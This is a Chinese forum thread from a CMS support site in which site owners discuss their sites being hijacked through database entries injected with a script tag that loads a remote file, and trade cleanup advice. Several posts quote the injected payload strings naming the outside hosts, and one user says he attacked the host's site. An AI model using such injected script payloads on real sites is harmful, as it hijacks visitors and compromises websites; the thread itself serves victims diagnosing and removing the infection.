搜索

[分享] 网站被挂马,出现新的方式

[复制链接]
823066711 发表于 2019-3-15 12:58:32 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?注册加入

x
网站被挂马跳到其他网站
以前出现过相同情况
但只是修改文件

这次被挂马 发现是数据库被修改了

在img中多了以下
字段"><script src=https://www.365dytt.net/data/admin/repword2.txt></script><a a="\n
q5241521 发表于 2019-3-15 20:02:46 | 显示全部楼层
我的也是啊
回复

使用道具 举报

btkk77 发表于 2019-3-15 22:13:34 | 显示全部楼层
一样被挂了,两个站都被改了
回复

使用道具 举报

lb20008 发表于 2019-3-15 22:38:14 | 显示全部楼层
本帖最后由 lb20008 于 2019-3-15 22:44 编辑

一样,数据没有判断机制么,凡是带script的都拦截
回复

使用道具 举报

lb20008 发表于 2019-3-15 22:42:22 | 显示全部楼层
只能批量替换"><script src=https://www.365dytt.net/data/admin/repword2.txt></script><a a="
回复

使用道具 举报

mrpyk 发表于 2019-3-15 23:33:53 | 显示全部楼层
采集的问题,采集站的问题。
回复

使用道具 举报

lb20008 发表于 2019-3-15 23:50:24 | 显示全部楼层
mrpyk 发表于 2019-3-15 23:33
采集的问题,采集站的问题。

不可能,几十万数据图片都被加上了js代码,连1号数据都加上了。要是采集问题早就有了
回复

使用道具 举报

jxssrxxh 发表于 2019-3-16 08:46:43 | 显示全部楼层
清楚干净后,可以考虑只给选择的权限,要更新的时候在加上。
回复

使用道具 举报

oy86866 发表于 2019-3-16 21:18:16 | 显示全部楼层
一样被挂马。。我日~
回复

使用道具 举报

oy86866 发表于 2019-3-16 21:18:53 | 显示全部楼层
mrpyk 发表于 2019-3-15 23:33
采集的问题,采集站的问题。

不是,是昨天刚爆发的。特么的,SQL注入的太牛逼了!!!
回复

使用道具 举报

a123698741 发表于 2019-3-16 22:15:03 | 显示全部楼层
用安全狗可以,这个我攻击了,结果他是高防的
回复

使用道具 举报

a123698741 发表于 2019-3-16 22:16:40 | 显示全部楼层
他居然放在后台了,我找了半天不见这个代码
QQ图片20190316221748.png
回复

使用道具 举报

a123698741 发表于 2019-3-16 22:17:49 | 显示全部楼层
集体是攻击他的网站  https://www.365dytt.net/
回复

使用道具 举报

a123698741 发表于 2019-3-16 22:18:13 | 显示全部楼层
集体是攻击他的网站  www.365dytt.net/
回复

使用道具 举报

1563920 发表于 2019-3-16 23:41:11 | 显示全部楼层
应该是sql注入,直接写入到数据库了。
回复

使用道具 举报

KingVstr 发表于 2019-3-17 08:07:10 | 显示全部楼层
lb20008 发表于 2019-3-15 22:38
一样,数据没有判断机制么,凡是带script的都拦截

请问如何设置呢
回复

使用道具 举报

cqwwwnet 发表于 2019-3-17 09:11:48 | 显示全部楼层
集体是攻击他的网站  www.365dytt.net/
回复

使用道具 举报

gujiahong 发表于 2019-3-17 10:02:40 | 显示全部楼层
本帖最后由 gujiahong 于 2019-3-17 10:43 编辑

https://www.365dytt.net/这个网站是我的,我也是受害者,我目前已经删除了这个文件,每周被挂马,什么云锁,宝塔防篡改插件都无效。
回复

使用道具 举报

lb20008 发表于 2019-3-17 10:31:37 | 显示全部楼层
gujiahong 发表于 2019-3-17 10:02
https://www.365dytt.net/这个网站是我的,我也是受害者,我目前已经删除了海洋的所有代码,改用其他系统了 ...

那你这个文件咋还在...https://www.365dytt.net/data/admin/repword2.txt
回复

使用道具 举报

gujiahong 发表于 2019-3-17 10:37:49 | 显示全部楼层
本帖最后由 gujiahong 于 2019-3-17 10:42 编辑

不在了,我弄了404跳转页面。
回复

使用道具 举报

gujiahong 发表于 2019-3-17 10:46:38 | 显示全部楼层
a123698741 发表于 2019-3-16 22:15
用安全狗可以,这个我攻击了,结果他是高防的

你也不想想,如果这网站是他的,他会轻易暴露给你,还有为什么不把流量跳转到这个网站呢?这个站是我的,我也是受害者,这一个月来都被挂了好几次码了,每次改的文件都不一样,真头大。怪不得前天被攻击,还好我是高防服务器,不然就挂了!
回复

使用道具 举报

a123698741 发表于 2019-3-17 12:41:14 | 显示全部楼层
gujiahong 发表于 2019-3-17 10:02
https://www.365dytt.net/这个网站是我的,我也是受害者,我目前已经删除了这个文件,每周被挂马,什么云锁 ...

安全狗设置TXT文件,这样他就没有办法上传txt文件了
回复

使用道具 举报

筑之风草 发表于 2019-3-18 11:18:46 | 显示全部楼层
我也在img中多了以下字段
uploads/allimg/190104/e6a571b385390122.jpg"><script src=https://52dy.me/data/admin/sitemap.txt></script><a a="

如何处理头痛
回复

使用道具 举报

winbiz 发表于 2019-3-18 12:26:48 | 显示全部楼层
我跟你一样,以前也只是修改文件,现在搞到数据库里面。

不过引用的那个木马网址也是受害者,并非黑客本人的网站
回复

使用道具 举报

winbiz 发表于 2019-3-18 12:27:37 | 显示全部楼层
筑之风草 发表于 2019-3-18 11:18
我也在img中多了以下字段
uploads/allimg/190104/e6a571b385390122.jpg">

跟你一毛一样,清理下数据库吧
回复

使用道具 举报

小黑屋|海洋CMS

GMT+8, 2019-3-26 11:10 , Processed in 0.108648 second(s), 24 queries

Powered by SeaCMS!

© 2015-2018 seacms.net.

快速回复 返回顶部 返回列表